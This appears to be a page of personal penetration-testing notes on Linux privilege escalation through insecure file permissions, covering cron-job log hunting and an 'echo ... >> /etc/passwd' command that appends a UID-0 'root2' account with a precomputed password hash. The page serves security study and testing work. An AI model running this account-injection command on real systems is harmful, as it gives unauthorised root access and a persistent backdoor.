TamaGorengs Notes
CtrlK
  • 👨‍💻Whoami
  • 🗺️Active Directory
    • Active Directory Enumeration
    • AD Reconnaissance
      • LDAP
    • Movement
      • Kerberos
        • ASREProast
        • Pass The Hash
        • Pass The Ticket
        • Overpass The Hash
      • Credential
        • Dumping
          • DCSync
      • WMI and WinRM
    • Active Directory Certificate Services (ADCS)
  • 🪟Windows
    • Windows Privilege Escalation
      • WinPrivEsc Enumeration
      • Leveraging Windows Services
      • Abusing Other Windows Components
    • RDP
    • Clock Skew Too Great
  • 🐧Linux
    • Linux Privilege Escalation
      • LinuxPrivEsc Enumeration
      • Exposed Confidential Information
      • Insecure File Permissions
      • Insecure System Components
  • 🕸️Web Application
    • SQL Injection
    • Cross-Site Scripting (XSS)
  • Group 1
    • Client-Side Attacks
      • Windows Library Files
      • Exploiting Microsoft Office
  • Thick Client
    • Thick Client Pentest
    • Thick Client Pentest Methodology
Powered by GitBook
On this page
  • Abusing Cron Jobs
  • Abusing Password Authentication

Was this helpful?

  1. 🐧Linux
  2. Linux Privilege Escalation

Insecure File Permissions

Abusing Cron Jobs

look for executed cron jobs from log, and see if the file is writable

grep "CRON" /var/log/syslog

Abusing Password Authentication

if we can write /etc/passwd we can replace the password or create new one with root permission

openssl passwd w00t

echo "root2:Fdzt.eqJQ4s0g:0:0:root:/root:/bin/bash" >> /etc/passwd
PreviousExposed Confidential InformationNextInsecure System Components

Last updated 6 months ago

Was this helpful?